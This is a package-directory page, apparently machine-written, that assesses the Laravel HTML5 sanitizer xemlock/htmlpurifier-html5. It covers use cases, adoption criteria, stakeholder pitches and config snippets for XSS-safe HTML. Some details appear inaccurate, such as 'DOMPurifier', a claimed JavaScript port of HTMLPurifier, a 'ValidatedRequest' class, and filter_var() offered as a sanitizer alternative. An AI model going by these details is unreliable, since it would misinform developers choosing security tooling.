Weave Code
Code Weaver
Helps Laravel developers discover, compare, and choose open-source packages. See popularity, security, maintainers, and scores at a glance to make better decisions.
Feedback
Share your thoughts, report bugs, or suggest improvements.
Subject
Message
Log in Register
Home
Packages
Htmlpurifier Html5
Assessments

Htmlpurifier Html5 Laravel Package

xemlock/htmlpurifier-html5

HTML5 definitions and tidy/sanitization rules for HTML Purifier, aligned with the WHATWG spec. Purify and normalize dirty HTML5 into valid output with an HTML5-ready config, plus flexible directives (e.g., safely allow YouTube iframes).

View on GitHub
Deep Wiki
Context7

Product Decisions This Supports

  • Secure Rich Text Editing: Enables Laravel applications to safely process user-generated HTML5 content (e.g., blog posts, wikis, or CMS entries) with full HTML5 element support while preventing XSS attacks. This directly addresses security and feature parity needs for modern web apps.
  • Build vs. Buy Decision: Eliminates the need to develop and maintain custom sanitization logic, reducing technical debt and leveraging a community-vetted, actively maintained solution. The package’s MIT license and Laravel-friendly Composer integration make adoption frictionless.
  • Roadmap Alignment for Semantic Web: Supports strategic initiatives like improving SEO (via semantic elements like <article>, <section>) and accessibility (WCAG compliance with proper HTML5 structure). Aligns with trends toward headless CMS and component-based architectures.
  • Use Cases:
    • Laravel-Based Content Platforms: Sanitize rich text inputs from editors like CKEditor or Quill while preserving HTML5 features (e.g., <figure>, <audio>).
    • Community-Driven Apps: Moderate user-submitted HTML (e.g., forums, Q&A) with granular controls (e.g., allow <iframe> only for YouTube via regex whitelisting).
    • APIs with HTML Payloads: Validate and sanitize HTML responses from third-party services (e.g., embedded widgets, social media cards) before rendering in Laravel views.
    • Legacy System Modernization: Gradually migrate from HTML4/XHTML sanitization to HTML5 without rewriting core logic.

When to Consider This Package

  • Adopt When:

    • Your Laravel app requires HTML5 compliance for modern features (e.g., semantic markup, media elements) but must strictly sanitize user input to prevent XSS.
    • You’re using Laravel’s Purifier facade or HTMLPurifier directly but need extended HTML5 support beyond legacy definitions (e.g., <dialog>, <track>).
    • Your stakeholders need fine-grained control over allowed elements/attributes (e.g., enabling <form> only in trusted contexts or whitelisting <iframe> sources).
    • You prioritize long-term maintainability: The package is actively updated (last release: 2026) and integrates seamlessly with Laravel’s ecosystem (Composer, service containers).
    • Your app handles user-generated HTML (e.g., comments, reviews) and requires both security and modern markup (e.g., allowing <video> but blocking malicious scripts).

  • Look Elsewhere If:

    • You need minimal sanitization (e.g., only basic formatting like <b>, <i>). Consider Laravel’s Str::markdown() or a lightweight library like ParagonIE/Sanitizer.
    • Your app doesn’t use HTML5 features (e.g., legacy systems or static content). The base HTMLPurifier may suffice, reducing dependency bloat.
    • You require client-side sanitization (e.g., real-time validation in SPAs). Pair this with a frontend library like DOMPurifier or use HTMLPurifier’s JavaScript port.
    • Performance is critical for high-throughput APIs (e.g., processing thousands of requests/sec). Benchmark against alternatives like PHP’s filter_var() for simple cases or consider caching purified outputs.
    • You need custom sanitization rules that aren’t covered by HTML5 standards. This package is opinionated; extending it may require forked maintenance.

How to Pitch It (Stakeholders)

For Executives/Business Stakeholders:

*"This package lets us enable modern web features while keeping users safe. Here’s why it’s a no-brainer:

  • Unlock Richer Content: Allow users to embed videos, semantic layouts (<article>), and interactive elements (<dialog>) without security risks. Think YouTube comments, interactive tutorials, or accessible documentation—all while blocking XSS attacks.
  • Save Development Time: Instead of building and debugging custom sanitization (which is error-prone and costly), we’re using a battle-tested, HTML5-compliant solution maintained by the community. This reduces bugs and speeds up feature delivery.
  • Future-Proof the Platform: HTML5 is the standard for SEO and accessibility. By adopting this now, we align with WCAG guidelines and search engine best practices, reducing long-term compliance costs.
  • Example Impact: If we want to let users embed Tweets or YouTube videos in posts, we can whitelist trusted domains in a config line—no custom code needed. This directly supports our growth goals for user engagement and monetization.

Risk: Minimal. The package is MIT-licensed, Laravel-friendly, and actively maintained. We’re not betting on unproven tech—just leveraging existing tools smarter."*

For Engineering/Technical Stakeholders:

*"This is a drop-in upgrade for Laravel’s HTML purification that solves two critical problems:

  1. Modern HTML5 Support: Adds 20+ elements (e.g., <video>, <track>, <dialog>) and attributes (e.g., async for <script>) while maintaining strict sanitization. No more hacking around with regex or custom parsers.
  2. Granular Control: Configure allowed elements/attributes via Laravel’s config() or service container. Examples:
    • Allow <iframe> only for YouTube: $config->set('HTML.SafeIframe', true)->set('URI.SafeIframeRegexp', '%^//www.youtube.com/embed/%');
    • Restrict forms to trusted contexts: $config->set('HTML.Forms', false);
    • Enable semantic markup for SEO: Default config already supports <article>, <section>, etc.

Integration:

  • Works seamlessly with Laravel’s Purifier facade or HTMLPurifier service provider.
  • Replace your current HTMLPurifier config with HTMLPurifier_HTML5Config::createDefault() in one line.
  • Extend existing Laravel validation rules (e.g., ValidatedRequest) to use the new config.

Performance:

  • Minimal overhead compared to base HTMLPurifier (same core engine, just extended definitions).
  • Caching purified outputs (e.g., via Laravel’s cache) mitigates any runtime cost.

Migration Path:

  1. Start by replacing HTMLPurifier with xemlock/htmlpurifier-html5 in composer.json.
  2. Update config to use HTMLPurifier_HTML5Config (backward-compatible with most existing setups).
  3. Test edge cases (e.g., nested HTML5 elements, custom attributes) in staging.

Alternatives Considered:

  • Base HTMLPurifier: Lacks HTML5 support; would require custom definitions (higher maintenance).
  • DOMPurifier (JS): Client-side only; doesn’t solve server-side sanitization needs.
  • Custom Regex: Unreliable for complex HTML5; prone to XSS vulnerabilities.

Recommendation: Adopt this package as part of our next major release cycle. It’s a low-risk, high-reward upgrade that enables features while reducing security risks."*

Weaver

How can I help you explore Laravel packages today?

Conversation history is not saved when not logged in.
Prompt
Add packages to context
No packages found.
emuniq/filament-browser-notifications
syriable/filament-translator
hungnm28/livewire-form
wenprise/eloquent
crudly/encrypted
fadion/bouncy
cuci/prototurk-sdk
gos/pubsub-router-bundle
cuci/prototurk-sdk-symfony
clementtalleu/easyadmin-markdown-bundle
codeflextech/permission-manager
karnoweb/livewire-datepicker
sayedenam/sayed-dashboard
milito/query-filter
apiboxsym/user-bundle
apiboxsym/health-check-bundle
jayeshmepani/jpl-moshier-ephemeris-php
elnasnato/laraliveui
labrodev/rest-sdk
sampaui/sampaui